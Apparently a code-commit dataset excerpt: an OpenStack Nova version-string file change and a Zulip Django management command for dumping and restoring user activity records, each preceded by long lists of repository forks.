ova,JianyuWang/nova,openstack/nova,shootstar/novatest,shahar-stratoscale/nova,houshengbo/nova_vmware_compute_driver,affo/nova,sebrandon1/nova,devoid/nova,devendermishrajio/nova_test_latest,usc-isi/nova,zhimin711/nova,CiscoSystems/nova,watonyweng/nova,apporc/nova,blueboxgroup/nova,gspilio/nova,viggates/nova,gooddata/openstack-nova,tudorvio/nova,Triv90/Nova,zzicewind/nova,rrader/nova-docker-plugin,bgxavier/nova,tianweizhang/nova,dims/nova,tudorvio/nova,scripnichenko/nova,SUSE-Cloud/nova,CCI-MOC/nova,qwefi/nova,Triv90/Nova,raildo/nova,jeffrey4l/nova,eonpatapon/nova,OpenAcademy-OpenStack/nova-scheduler,ted-gould/nova,takeshineshiro/nova,vmturbo/nova,eayunstack/nova,klmitch/nova,CCI-MOC/nova,iuliat/nova,cloudbau/nova,hanlind/nova,noironetworks/nova,dawnpower/nova,whitepages/nova,berrange/nova,plumgrid/plumgrid-nova,TwinkleChawla/nova,angdraug/nova,akash1808/nova,houshengbo/nova_vmware_compute_driver,sridevikoushik31/nova,rahulunair/nova,mahak/nova,dstroppa/openstack-smartos-nova-grizzly,yosshy/nova,devendermishrajio/nova,LoHChina/nova,adelina-t/nova,petrutlucian94/nova_dev,citrix-openstack-build/nova,dstroppa/openstack-smartos-nova-grizzly,bclau/nova,imsplitbit/nova,Juniper/nova,bclau/nova | nova/version.py | nova/version.py | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
NOVA_VERSION = ['2013', '1', None]
YEAR, COUNT, REVISION = NOVA_VERSION
FINAL = False # This becomes true at Release Candidate time
def canonical_version_string():
return '.'.join(filter(None, NOVA_VERSION))
def version_string():
if FINAL:
return canonical_version_string()
else:
return '%s-dev' % (canonical_version_string(),)
def vcs_version_string():
return 'LOCALBRANCH:LOCALREVISION'
def version_string_with_vcs():
return '%s-%s' % (canonical_version_string(), vcs_version_string())
| # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2011 OpenStack LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
NOVA_VERSION = ['2012', '2', None]
YEAR, COUNT, REVISION = NOVA_VERSION
FINAL = False # This becomes true at Release Candidate time
def canonical_version_string():
return '.'.join(filter(None, NOVA_VERSION))
def version_string():
if FINAL:
return canonical_version_string()
else:
return '%s-dev' % (canonical_version_string(),)
def vcs_version_string():
return 'LOCALBRANCH:LOCALREVISION'
def version_string_with_vcs():
return '%s-%s' % (canonical_version_string(), vcs_version_string())
| apache-2.0 | Python |
1681651b7d606436550aad3d696f5f1ba335caa9 | Add dump_useractivity migration helper tool. | wavelets/zulip,jonesgithub/zulip,mahim97/zulip,vikas-parashar/zulip,natanovia/zulip,proliming/zulip,gkotian/zulip,LeeRisk/zulip,jeffcao/zulip,kokoar/zulip,dxq-git/zulip,ipernet/zulip,itnihao/zulip,schatt/zulip,xuxiao/zulip,nicholasbs/zulip,yocome/zulip,isht3/zulip,willingc/zulip,aakash-cr7/zulip,noroot/zulip,DazWorrall/zulip,ApsOps/zulip,bitemyapp/zulip,yuvipanda/zulip,Suninus/zulip,shrikrishnaholla/zulip,guiquanz/zulip,suxinde2009/zulip,m1ssou/zulip,LAndreas/zulip,seapasulli/zulip,zhaoweigg/zulip,verma-varsha/zulip,ApsOps/zulip,noroot/zulip,voidException/zulip,kokoar/zulip,rishig/zulip,xuanhan863/zulip,calvinleenyc/zulip,umkay/zulip,mdavid/zulip,bluesea/zulip,Vallher/zulip,wweiradio/zulip,littledogboy/zulip,PhilSk/zulip,vaidap/zulip,brainwane/zulip,pradiptad/zulip,Frouk/zulip,themass/zulip,LAndreas/zulip,tommyip/zulip,Gabriel0402/zulip,amallia/zulip,JPJPJPOPOP/zulip,themass/zulip,grave-w-grave/zulip,bssrdf/zulip,dotcool/zulip,joshisa/zulip,vakila/zulip,tbutter/zulip,ufosky-server/zulip,DazWorrall/zulip,johnny9/zulip,vabs22/zulip,deer-hope/zulip,pradiptad/zulip,bssrdf/zulip,zachallaun/zulip,huangkebo/zulip,yuvipanda/zulip,joshisa/zulip,johnny9/zulip,TigorC/zulip,jimmy54/zulip,rht/zulip,LeeRisk/zulip,MariaFaBella85/zulip,bluesea/zulip,zacps/zulip,blaze225/zulip,hafeez3000/zulip,samatdav/zulip,krtkmj/zulip,nicholasbs/zulip,jrowan/zulip,hafeez3000/zulip,karamcnair/zulip,m1ssou/zulip,KingxBanana/zulip,saitodisse/zulip,kokoar/zulip,armooo/zulip,atomic-labs/zulip,mohsenSy/zulip,willingc/zulip,codeKonami/zulip,vabs22/zulip,peiwei/zulip,cosmicAsymmetry/zulip,gigawhitlocks/zulip,AZtheAsian/zulip,PaulPetring/zulip,luyifan/zulip,Qgap/zulip,umkay/zulip,zofuthan/zulip,Gabriel0402/zulip,zulip/zulip,dhcrzf/zulip,ufosky-server/zulip,so0k/zulip,arpitpanwar/zulip,shubhamdhama/zulip,reyha/zulip,kaiyuanheshang/zulip,seapasulli/zulip,fw1121/zulip,saitodisse/zulip,technicalpickles/zulip,pradiptad/zulip,Batterfii/zulip,reyha/zulip,themass/zulip,gigawhitlocks/zulip,sonali0901/zulip,hj3938/zulip,Diptanshu8/zulip,gigawhitlocks/zulip,Juanvulcano/zulip,karamcnair/zulip,timabbott/zulip,Vallher/zulip,aps-sids/zulip,verma-varsha/zulip,ahmadassaf/zulip,alliejones/zulip,nicholasbs/zulip,m1ssou/zulip,developerfm/zulip,zacps/zulip,aps-sids/zulip,vikas-parashar/zulip,Jianchun1/zulip,swinghu/zulip,natanovia/zulip,hackerkid/zulip,AZtheAsian/zulip,zofuthan/zulip,bastianh/zulip,kaiyuanheshang/zulip,adnanh/zulip,sonali0901/zulip,tommyip/zulip,PaulPetring/zulip,eeshangarg/zulip,rht/zulip,vikas-parashar/zulip,Galexrt/zulip,ApsOps/zulip,MariaFaBella85/zulip,qq1012803704/zulip,hayderimran7/zulip,AZtheAsian/zulip,Drooids/zulip,udxxabp/zulip,eastlhu/zulip,moria/zulip,ipernet/zulip,mdavid/zulip,MayB/zulip,susansls/zulip,peiwei/zulip,Vallher/zulip,johnnygaddarr/zulip,codeKonami/zulip,kokoar/zulip,jphilipsen05/zulip,Jianchun1/zulip,blaze225/zulip,jainayush975/zulip,dwrpayne/zulip,noroot/zulip,adnanh/zulip,JPJPJPOPOP/zulip,wdaher/zulip,tdr130/zulip,RobotCaleb/zulip,niftynei/zulip,eastlhu/zulip,Drooids/zulip,peguin40/zulip,dawran6/zulip,showell/zulip,mansilladev/zulip,jerryge/zulip,karamcnair/zulip,kokoar/zulip,luyifan/zulip,moria/zulip,schatt/zulip,jessedhillon/zulip,praveenaki/zulip,yuvipanda/zulip,dxq-git/zulip,ahmadassaf/zulip,Galexrt/zulip,natanovia/zulip,wangdeshui/zulip,andersk/zulip,wdaher/zulip,praveenaki/zulip,aps-sids/zulip,he15his/zulip,synicalsyntax/zulip,zofuthan/zulip,deer-hope/zulip,lfranchi/zulip,easyfmxu/zulip,bssrdf/zulip,zorojean/zulip,bitemyapp/zulip,suxinde2009/zulip,ahmadassaf/zulip,willingc/zulip,eastlhu/zulip,paxapy/zulip,pradiptad/zulip,avastu/zulip,jimmy54/zulip,sharmaeklavya2/zulip,punchagan/zulip,jackrzhang/zulip,rishig/zulip,j831/zulip,moria/zulip,LeeRisk/zulip,vikas-parashar/zulip,umkay/zulip,grave-w-grave/zulip,aliceriot/zulip,synicalsyntax/zulip,Jianchun1/zulip,cosmicAsymmetry/zulip,souravbadami/zulip,Suninus/zulip,jonesgithub/zulip,qq1012803704/zulip,themass/zulip,dotcool/zulip,zulip/zulip,jackrzhang/zulip,hayderimran7/zulip,luyifan/zulip,themass/zulip,hustlzp/zulip,udxxabp/zulip,christi3k/zulip,ryanbackman/zulip,thomasboyt/zulip,jackrzhang/zulip,bowlofstew/zulip,suxinde2009/zulip,codeKonami/zulip,JanzTam/zulip,lfranchi/zulip,guiquanz/zulip,willingc/zulip,Drooids/zulip,bssrdf/zulip,fw1121/zulip,levixie/zulip,zhaoweigg/zulip,tdr130/zulip,wweiradio/zulip,shaunstanislaus/zulip,luyifan/zulip,udxxabp/zulip,samatdav/zulip,yuvipanda/zulip,bluesea/zulip,dxq-git/zulip,jeffcao/zulip,Batterfii/zulip,joyhchen/zulip,firstblade/zulip,RobotCaleb/zulip,bssrdf/zulip,bastianh/zulip,peiwei/zulip,bastianh/zulip,zwily/zulip,kokoar/zulip,dhcrzf/zulip,voidException/zulip,adnanh/zulip,mdavid/zulip,pradiptad/zulip,ryanbackman/zulip,ufosky-server/zulip,wweiradio/zulip,MayB/zulip,tbutter/zulip,arpitpanwar/zulip,hj3938/zulip,vabs22/zulip,MayB/zulip,thomasboyt/zulip,xuanhan863/zulip,littledogboy/zulip,itnihao/zulip,bitemyapp/zulip,amallia/zulip,ufosky-server/zulip,proliming/zulip,swinghu/zulip,PhilSk/zulip,zorojean/zulip,rishig/zulip,amanharitsh123/zulip,m1ssou/zulip,vikas-parashar/zulip,seapasulli/zulip,wavelets/zulip,PaulPetring/zulip,atomic-labs/zulip,zhaoweigg/zulip,vaidap/zulip,dwrpayne/zulip,jphilipsen05/zulip,ikasumiwt/zulip,jrowan/zulip,sonali0901/zulip,sonali0901/zulip,jeffcao/zulip,mansilladev/zulip,voidException/zulip,jphilipsen05/zulip,itnihao/zulip,Gabriel0402/zulip,dnmfarrell/zulip,Cheppers/zulip,cosmicAsymmetry/zulip,AZtheAsian/zulip,he15his/zulip,xuanhan863/zulip,MayB/zulip,umkay/zulip,luyifan/zulip,technicalpickles/zulip,schatt/zulip,dotcool/zulip,dattatreya303/zulip,lfranchi/zulip,wangdeshui/zulip,souravbadami/zulip,xuxiao/zulip,itnihao/zulip,mahim97/zulip,gkotian/zulip,tommyip/zulip,seapasulli/zulip,ashwinirudrappa/zulip,alliejones/zulip,dhcrzf/zulip,sonali0901/zulip,kou/zulip,johnny9/zulip,qq1012803704/zulip,stamhe/zulip,mahim97/zulip,easyfmxu/zulip,Cheppers/zulip,shrikrishnaholla/zulip,Frouk/zulip,joyhchen/zulip,jphilipsen05/zulip,Qgap/zulip,ahmadassaf/zulip,MariaFaBella85/zulip,zhaoweigg/zulip,Batterfii/zulip,zulip/zulip,christi3k/zulip,zachallaun/zulip,Cheppers/zulip,hackerkid/zulip,so0k/zulip,avastu/zulip,amanharitsh123/zulip,showell/zulip,easyfmxu/zulip,Jianchun1/zulip,wdaher/zulip,armooo/zulip,amallia/zulip,jimmy54/zulip,dawran6/zulip,samatdav/zulip,jessedhillon/zulip,guiquanz/zulip,MayB/zulip,jessedhillon/zulip,DazWorrall/zulip,joshisa/zulip,DazWorrall/zulip,wdaher/zulip,dattatreya303/zulip,EasonYi/zulip,bowlofstew/zulip,hj3938/zulip,grave-w-grave/zulip,babbage/zulip,Diptanshu8/zulip,joyhchen/zulip,cosmicAsymmetry/zulip,Batterfii/zulip,lfranchi/zulip,shubhamdhama/zulip,ryansnowboarder/zulip,TigorC/zulip,brockwhittaker/zulip,developerfm/zulip,peguin40/zulip,Frouk/zulip,reyha/zulip,shaunstanislaus/zulip,Drooids/zulip,EasonYi/zulip,arpith/zulip,andersk/zulip,hackerkid/zulip,RobotCaleb/zulip,zwily/zulip,samatdav/zulip,arpith/zulip,suxinde2009/zulip,jimmy54/zulip,sharmaeklavya2/zulip,shaunstanislaus/zulip,schatt/zulip,praveenaki/zulip,luyifan/zulip,hengqujushi/zulip,zwily/zulip,bowlofstew/zulip,swinghu/zulip,akuseru/zulip,Juanvulcano/zulip,timabbott/zulip,developerfm/zulip,krtkmj/zulip,blaze225/zulip,technicalpickles/zulip,hengqujushi/zulip,xuxiao/zulip,bluesea/zulip,firstblade/zulip,jainayush975/zulip,showell/zulip,he15his/zulip,souravbadami/zulip,Suninus/zulip,kokoar/zulip,ApsOps/zulip,zacps/zulip,jonesgithub/zulip,DazWorrall/zulip,glovebx/zulip,zachallaun/zulip,punchagan/zulip,stamhe/zulip,amyliu345/zulip,ashwinirudrappa/zulip,yuvipanda/zulip,umkay/zulip,zulip/zulip,hj3938/zulip,gkotian/zulip,andersk/zulip,PaulPetring/zulip,natanovia/zulip,m1ssou/zulip,timabbott/zulip,grave-w-grave/zulip,wweiradio/zulip,m1ssou/zulip,JanzTam/zulip,LAndreas/zulip,andersk/zulip,jackrzhang/zulip,itnihao/zulip,zwily/zulip,wavelets/zulip,wweiradio/zulip,tdr130/zulip,aliceriot/zulip,DazWorrall/zulip,dattatreya303/zulip,joyhchen/zulip,tiansiyuan/zulip,amyliu345/zulip,levixie/zulip,AZtheAsian/zulip,showell/zulip,hj3938/zulip,hafeez3000/zulip,brainwane/zulip,deer-hope/zulip,dawran6/zulip,tommyip/zulip,voidException/zulip,punchagan/zulip,calvinleenyc/zulip,timabbott/zulip,Qgap/zulip,tbutter/zulip,swinghu/zulip,bitemyapp/zulip,blaze225/zulip,lfranchi/zulip,vabs22/zulip,guiquanz/zulip,tbutter/zulip,punchagan/zulip,reyha/zulip,dnmfarrell/zulip,adnanh/zulip,showell/zulip,nicholasbs/zulip,alliejones/zulip,Cheppers/zulip,firstblade/zulip,jonesgithub/zulip,swinghu/zulip,xuanhan863/zulip,Suninus/zulip,sharmaeklavya2/zulip,xuanhan863/zulip,mdavid/zulip,qq1012803704/zulip,jackrzhang/zulip,natanovia/zulip,jimmy54/zulip,zhaoweigg/zulip,Vallher/zulip,xuanhan863/zulip,ipernet/zulip,SmartPeople/zulip,aps-sids/zulip,ryansnowboarder/zulip,moria/zulip,kou/zulip,tommyip/zulip,ryanbackman/zulip,dhcrzf/zulip,thomasboyt/zulip,ashwinirudrappa/zulip,vaidap/zulip,shaunstanislaus/zulip,thomasboyt/zulip,zachallaun/zulip,tiansiyuan/zulip,proliming/zulip,kou/zulip,armooo/zulip,akuseru/zulip,so0k/zulip,EasonYi/zulip,tiansiyuan/zulip,huangkebo/zulip,hayderimran7/zulip,gkotian/zulip,vabs22/zulip,isht3/zulip,bssrdf/zulip,joyhchen/zulip,hafeez3000/zulip,ericzhou2008/zulip,eeshangarg/zulip,PhilSk/zulip,Batterfii/zulip,jeffcao/zulip,hustlzp/zulip,firstblade/zulip,bitemyapp/zulip,jphilipsen05/zulip,gigawhitlocks/zulip,wavelets/zulip,ikasumiwt/zulip,noroot/zulip,atomic-labs/zulip,dnmfarrell/zulip,guiquanz/zulip,jessedhillon/zulip,suxinde2009/zulip,sharmaeklavya2/zulip,LeeRisk/zulip,hackerkid/zulip,gkotian/zulip,zwily/zulip,shrikrishnaholla/zulip,wdaher/zulip,technicalpickles/zulip,tdr130/zulip,thomasboyt/zulip,dawran6/zulip,TigorC/zulip,paxapy/zulip,niftynei/zulip,technicalpickles/zulip,amyliu345/zulip,verma-varsha/zulip,Juanvulcano/zulip,sup95/zulip,ashwinirudrappa/zulip,RobotCaleb/zulip,littledogboy/zulip,tiansiyuan/zulip,jeffcao/zulip,hackerkid/zulip,stamhe/zulip,amanharitsh123/zulip,ikasumiwt/zulip,johnny9/zulip,dattatreya303/zulip,sharmaeklavya2/zulip,JanzTam/zulip,developerfm/zulip,paxapy/zulip,Jianchun1/zulip,verma-varsha/zulip,EasonYi/zulip,developerfm/zulip,amallia/zulip,shubhamdhama/zulip,JPJPJPOPOP/zulip,moria/zulip,stamhe/zulip,JPJPJPOPOP/zulip,MariaFaBella85/zulip,Diptanshu8/zulip,ashwinirudrappa/zulip,willingc/zulip,ikasumiwt/zulip,jerryge/zulip,susansls/zulip,zofuthan/zulip,ryansnowboarder/zulip,MariaFaBella85/zulip,huangkebo/zulip,tdr130/zulip,Frouk/zulip,jerryge/zulip,vakila/zulip,natanovia/zulip,MayB/zulip,rishig/zulip,dattatreya303/zulip,aps-sids/zulip,yuvipanda/zulip,sonali0901/zulip,easyfmxu/zulip,joshisa/zulip,aakash-cr7/zulip,sup95/zulip,hayderimran7/zulip,yocome/zulip,saitodisse/zulip,shrikrishnaholla/zulip,udxxabp/zulip,zwily/zulip,jackrzhang/zulip,seapasulli/zulip,hengqujushi/zulip,EasonYi/zulip,j831/zulip,hackerkid/zulip,arpitpanwar/zulip,dxq-git/zulip,calvinleenyc/zulip,willingc/zulip,avastu/zulip,j831/zulip,qq1012803704/zulip,glovebx/zulip,swinghu/zulip,hengqujushi/zulip,codeKonami/zulip,proliming/zulip,aliceriot/zulip,wdaher/zulip,dotcool/zulip,atomic-labs/zulip,timabbott/zulip,dhcrzf/zulip,schatt/zulip,ipernet/zulip,themass/zulip,ericzhou2008/zulip,glovebx/zulip,Drooids/zulip,krtkmj/zulip,ApsOps/zulip,dnmfarrell/zulip,brainwane/zulip,bitemyapp/zulip,ryansnowboarder/zulip,ericzhou2008/zulip,zofuthan/zulip,christi3k/zulip,glovebx/zulip,johnny9/zulip,KingxBanana/zulip,DazWorrall/zulip,joshisa/zulip,paxapy/zulip,aakash-cr7/zulip,johnnygaddarr/zulip,eeshangarg/zulip,stamhe/zulip,JanzTam/zulip,mansilladev/zulip,mdavid/zulip,peguin40/zulip,mansilladev/zulip,hengqujushi/zulip,jimmy54/zulip,mohsenSy/zulip,saitodisse/zulip,cosmicAsymmetry/zulip,TigorC/zulip,zulip/zulip,christi3k/zulip,krtkmj/zulip,LAndreas/zulip,punchagan/zulip,seapasulli/zulip,synicalsyntax/zulip,johnny9/zulip,babbage/zulip,zhaoweigg/zulip,kaiyuanheshang/zulip,Gabriel0402/zulip,j831/zulip,EasonYi/zulip,PaulPetring/zulip,shrikrishnaholla/zulip,Jianchun1/zulip,ahmadassaf/zulip,adnanh/zulip,synicalsyntax/zulip,kaiyuanheshang/zulip,noroot/zulip,sup95/zulip,dnmfarrell/zulip,shrikrishnaholla/zulip,jerryge/zulip,Qgap/zulip,easyfmxu/zulip,ryanbackman/zulip,bastianh/zulip,ryanbackman/zulip,rht/zulip,brockwhittaker/zulip,vakila/zulip,adnanh/zulip,zorojean/zulip,zulip/zulip,swinghu/zulip,ryanbackman/zulip,qq1012803704/zulip,rht/zulip,peguin40/zulip,jphilipsen05/zulip,jonesgithub/zulip,firstblade/zulip,calvinleenyc/zulip,kou/zulip,schatt/zulip,jainayush975/zulip,esander91/zulip,jimmy54/zulip,LAndreas/zulip,peguin40/zulip,tiansiyuan/zulip,udxxabp/zulip,akuseru/zulip,qq1012803704/zulip,zachallaun/zulip,ufosky-server/zulip,shubhamdhama/zulip,JPJPJPOPOP/zulip,dwrpayne/zulip,karamcnair/zulip,esander91/zulip,easyfmxu/zulip,alliejones/zulip,arpitpanwar/zulip,udxxabp/zulip,akuseru/zulip,lfranchi/zulip,mdavid/zulip,hackerkid/zulip,bowlofstew/zulip,firstblade/zulip,kaiyuanheshang/zulip,ApsOps/zulip,littledogboy/zulip,xuxiao/zulip,dawran6/zulip,amallia/zulip,ryansnowboarder/zulip,atomic-labs/zulip,zorojean/zulip,schatt/zulip,niftynei/zulip,niftynei/zulip,fw1121/zulip,levixie/zulip,wangdeshui/zulip,he15his/zulip,KJin99/zulip,eeshangarg/zulip,deer-hope/zulip,Cheppers/zulip,vikas-parashar/zulip,johnnygaddarr/zulip,rht/zulip,PhilSk/zulip,ipernet/zulip,glovebx/zulip,xuanhan863/zulip,fw1121/zulip,rht/zulip,fw1121/zulip,noroot/zulip,seapasulli/zulip,yocome/zulip,littledogboy/zulip,zwily/zulip,guiquanz/zulip,dxq-git/zulip,PaulPetring/zulip,bastianh/zulip,ikasumiwt/zulip,Vallher/zulip,ipernet/zulip,voidException/zulip,peiwei/zulip,zacps/zulip,SmartPeople/zulip,KingxBanana/zulip,KJin99/zulip,so0k/zulip,babbage/zulip,fw1121/zulip,littledogboy/zulip,shubhamdhama/zulip,verma-varsha/zulip,tommyip/zulip,wavelets/zulip,ufosky-server/zulip,niftynei/zulip,krtkmj/zulip,stamhe/zulip,bluesea/zulip,moria/zulip,JPJPJPOPOP/zulip,amyliu345/zulip,punchagan/zulip,aliceriot/zulip,showell/zulip,blaze225/zulip,yuvipanda/zulip,peiwei/zulip,JanzTam/zulip,Suninus/zulip,Drooids/zulip,armooo/zulip,willingc/zulip,vaidap/zulip,huangkebo/zulip,akuseru/zulip,codeKonami/zulip,fw1121/zulip,esander91/zulip,mohsenSy/zulip,aliceriot/zulip,brainwane/zulip,firstblade/zulip,alliejones/zulip,rht/zulip,christi3k/zulip,praveenaki/zulip,Juanvulcano/zulip,mohsenSy/zulip,dawran6/zulip,hj3938/zulip,dnmfarrell/zulip,arpitpanwar/zulip,andersk/zulip,grave-w-grave/zulip,j831/zulip,babbage/zulip,shrikrishnaholla/zulip,LAndreas/zulip,calvinleenyc/zulip,umkay/zulip,bastianh/zulip,jessedhillon/zulip,dwrpayne/zulip,ufosky-server/zulip,jonesgithub/zulip,Galexrt/zulip,ericzhou2008/zulip,SmartPeople/zulip,esander91/zulip,deer-hope/zulip,Galexrt/zulip,j831/zulip,hengqujushi/zulip,mahim97/zulip,rishig/zulip,levixie/zulip,noroot/zulip,amanharitsh123/zulip,krtkmj/zulip,Vallher/zulip,bowlofstew/zulip,hafeez3000/zulip,wangdeshui/zulip,SmartPeople/zulip,samatdav/zulip,mansilladev/zulip,arpith/zulip,alliejones/zulip,susansls/zulip,MariaFaBella85/zulip,jainayush975/zulip,bluesea/zulip,gigawhitlocks/zulip,he15his/zulip,vakila/zulip,deer-hope/zulip,verma-varsha/zulip,Frouk/zulip,akuseru/zulip,wangdeshui/zulip,shaunstanislaus/zulip,atomic-labs/zulip,zorojean/zulip,brainwane/zulip,isht3/zulip,LeeRisk/zulip,RobotCaleb/zulip,ashwinirudrappa/zulip,SmartPeople/zulip,rishig/zulip,Galexrt/zulip,KJin99/zulip,levixie/zulip,Diptanshu8/zulip,LeeRisk/zulip,nicholasbs/zulip,aakash-cr7/zulip,Qgap/zulip,babbage/zulip,johnnygaddarr/zulip,avastu/zulip,reyha/zulip,huangkebo/zulip,bowlofstew/zulip,xuxiao/zulip,huangkebo/zulip,yocome/zulip,arpitpanwar/zulip,dxq-git/zulip,guiquanz/zulip,peiwei/zulip,voidException/zulip,littledogboy/zulip,themass/zulip,jerryge/zulip,johnnygaddarr/zulip,atomic-labs/zulip,natanovia/zulip,suxinde2009/zulip,Cheppers/zulip,jainayush975/zulip,Diptanshu8/zulip,souravbadami/zulip,armooo/zulip,andersk/zulip,ericzhou2008/zulip,zacps/zulip,timabbott/zulip,shaunstanislaus/zulip,vakila/zulip,Gabriel0402/zulip,esander91/zulip,so0k/zulip,babbage/zulip,wavelets/zulip,nicholasbs/zulip,bastianh/zulip,jonesgithub/zulip,tbutter/zulip,jainayush975/zulip,eastlhu/zulip,joyhchen/zulip,huangkebo/zulip,ApsOps/zulip,vakila/zulip,PaulPetring/zulip,mansilladev/zulip,cosmicAsymmetry/zulip,karamcnair/zulip,dotcool/zulip,hustlzp/zulip,isht3/zulip,easyfmxu/zulip,arpith/zulip,Diptanshu8/zulip,tdr130/zulip,Frouk/zulip,karamcnair/zulip,Juanvulcano/zulip,itnihao/zulip,yocome/zulip,TigorC/zulip,hustlzp/zulip,brockwhittaker/zulip,amyliu345/zulip,ahmadassaf/zulip,zacps/zulip,amallia/zulip,arpitpanwar/zulip,technicalpickles/zulip,kou/zulip,developerfm/zulip,zachallaun/zulip,calvinleenyc/zulip,praveenaki/zulip,yocome/zulip,kaiyuanheshang/zulip,codeKonami/zulip,jeffcao/zulip,showell/zulip,moria/zulip,bssrdf/zulip,krtkmj/zulip,armooo/zulip,esander91/zulip,ahmadassaf/zulip,hafeez3000/zulip,jerryge/zulip,ericzhou2008/zulip,aakash-cr7/zulip,avastu/zulip,glovebx/zulip,akuseru/zulip,rishig/zulip,bowlofstew/zulip,ikasumiwt/zulip,karamcnair/zulip,zhaoweigg/zulip,tdr130/zulip,mohsenSy/zulip,tbutter/zulip,JanzTam/zulip,ryansnowboarder/zulip,tiansiyuan/zulip,saitodisse/zulip,zorojean/zulip,PhilSk/zulip,Galexrt/zulip,bitemyapp/zulip,amyliu345/zulip,MayB/zulip,suxinde2009/zulip,amanharitsh123/zulip,brainwane/zulip,dwrpayne/zulip,peguin40/zulip,eastlhu/zulip,punchagan/zulip,so0k/zulip,wavelets/zulip,johnny9/zulip,aliceriot/zulip,hayderimran7/zulip,eastlhu/zulip,ryansnowboarder/zulip,arpith/zulip,synicalsyntax/zulip,nicholasbs/zulip,Qgap/zulip,Batterfii/zulip,Drooids/zulip,aliceriot/zulip,jrowan/zulip,zulip/zulip,udxxabp/zulip,vabs22/zulip,esander91/zulip,jerryge/zulip,wweiradio/zulip,saitodisse/zulip,hustlzp/zulip,sup95/zulip,avastu/zulip,luyifan/zulip,shubhamdhama/zulip,KJin99/zulip,zofuthan/zulip,souravbadami/zulip,KingxBanana/zulip,amallia/zulip,codeKonami/zulip,AZtheAsian/zulip,armooo/zulip,jackrzhang/zulip,brockwhittaker/zulip,susansls/zulip,amanharitsh123/zulip,saitodisse/zulip,TigorC/zulip,pradiptad/zulip,peiwei/zulip,RobotCaleb/zulip,wdaher/zulip,vaidap/zulip,deer-hope/zulip,hayderimran7/zulip,Frouk/zulip,zachallaun/zulip,synicalsyntax/zulip,wangdeshui/zulip,EasonYi/zulip,dwrpayne/zulip,Galexrt/zulip,RobotCaleb/zulip,blaze225/zulip,glovebx/zulip,dnmfarrell/zulip,jrowan/zulip,Juanvulcano/zulip,ashwinirudrappa/zulip,brockwhittaker/zulip,voidException/zulip,zofuthan/zulip,dattatreya303/zulip,MariaFaBella85/zulip,Gabriel0402/zulip,dwrpayne/zulip,samatdav/zulip,gkotian/zulip,adnanh/zulip,KJin99/zulip,proliming/zulip,avastu/zulip,LAndreas/zulip,Qgap/zulip,proliming/zulip,developerfm/zulip,stamhe/zulip,KingxBanana/zulip,wweiradio/zulip,vaidap/zulip,ipernet/zulip,dotcool/zulip,m1ssou/zulip,xuxiao/zulip,eeshangarg/zulip,LeeRisk/zulip,shaunstanislaus/zulip,hj3938/zulip,hengqujushi/zulip,timabbott/zulip,Vallher/zulip,isht3/zulip,arpith/zulip,susansls/zulip,vakila/zulip,paxapy/zulip,aps-sids/zulip,alliejones/zulip,eastlhu/zulip,itnihao/zulip,tiansiyuan/zulip,eeshangarg/zulip,ericzhou2008/zulip,Batterfii/zulip,susansls/zulip,dhcrzf/zulip,Cheppers/zulip,dhcrzf/zulip,sharmaeklavya2/zulip,gigawhitlocks/zulip,xuxiao/zulip,he15his/zulip,jeffcao/zulip,hayderimran7/zulip,sup95/zulip,KJin99/zulip,levixie/zulip,wangdeshui/zulip,andersk/zulip,lfranchi/zulip,he15his/zulip,johnnygaddarr/zulip,niftynei/zulip,babbage/zulip,aakash-cr7/zulip,kou/zulip,jrowan/zulip,brainwane/zulip,gkotian/zulip,mahim97/zulip,proliming/zulip,gigawhitlocks/zulip,mohsenSy/zulip,Suninus/zulip,brockwhittaker/zulip,yocome/zulip,praveenaki/zulip,tommyip/zulip,mansilladev/zulip,umkay/zulip,dxq-git/zulip,grave-w-grave/zulip,ikasumiwt/zulip,dotcool/zulip,PhilSk/zulip,sup95/zulip,tbutter/zulip,mahim97/zulip,hustlzp/zulip,zorojean/zulip,SmartPeople/zulip,shubhamdhama/zulip,reyha/zulip,jessedhillon/zulip,Gabriel0402/zulip,jessedhillon/zulip,so0k/zulip,eeshangarg/zulip,levixie/zulip,thomasboyt/zulip,hafeez3000/zulip,kou/zulip,KJin99/zulip,christi3k/zulip,aps-sids/zulip,joshisa/zulip,bluesea/zulip,souravbadami/zulip,pradiptad/zulip,paxapy/zulip,KingxBanana/zulip,mdavid/zulip,johnnygaddarr/zulip,hustlzp/zulip,jrowan/zulip,thomasboyt/zulip,isht3/zulip,technicalpickles/zulip,joshisa/zulip,praveenaki/zulip,synicalsyntax/zulip,kaiyuanheshang/zulip,JanzTam/zulip,Suninus/zulip | zephyr/management/commands/dump_useractivity.py | zephyr/management/commands/dump_useractivity.py | from optparse import make_option
from django.core.management.base import BaseCommand
from zephyr.models import Realm, UserProfile, UserActivity, get_client
import simplejson
from zephyr.lib.time import datetime_to_timestamp, timestamp_to_datetime
def dump():
pointers = []
for activity in UserActivity.objects.select_related("user_profile__user__email",
"client__name").all():
pointers.append((activity.user_profile.user.email, activity.client.name,
activity.query, activity.count,
datetime_to_timestamp(activity.last_visit)))
file("dumped-activity", "w").write(simplejson.dumps(pointers) + "\n")
def restore(change):
for (email, client_name, query, count, timestamp) in simplejson.loads(file("dumped-activity").read()):
user_profile = UserProfile.objects.get(user__email=email)
client = get_client(client_name)
last_visit = timestamp_to_datetime(timestamp)
print "%s: activity for %s,%s" % (email, client_name, query)
if change:
activity, created = UserActivity.objects.get_or_create(user_profile=user_profile,
query=query, client=client,
defaults={"last_visit": last_visit,
"count": count})
if not created:
activity.count += count
activity.last_visit = max(last_visit, activity.last_visit)
activity.save()
class Command(BaseCommand):
option_list = BaseCommand.option_list + (
make_option('--restore', default=False, action='store_true'),
make_option('--dry-run', '-n', default=False, action='store_true'),)
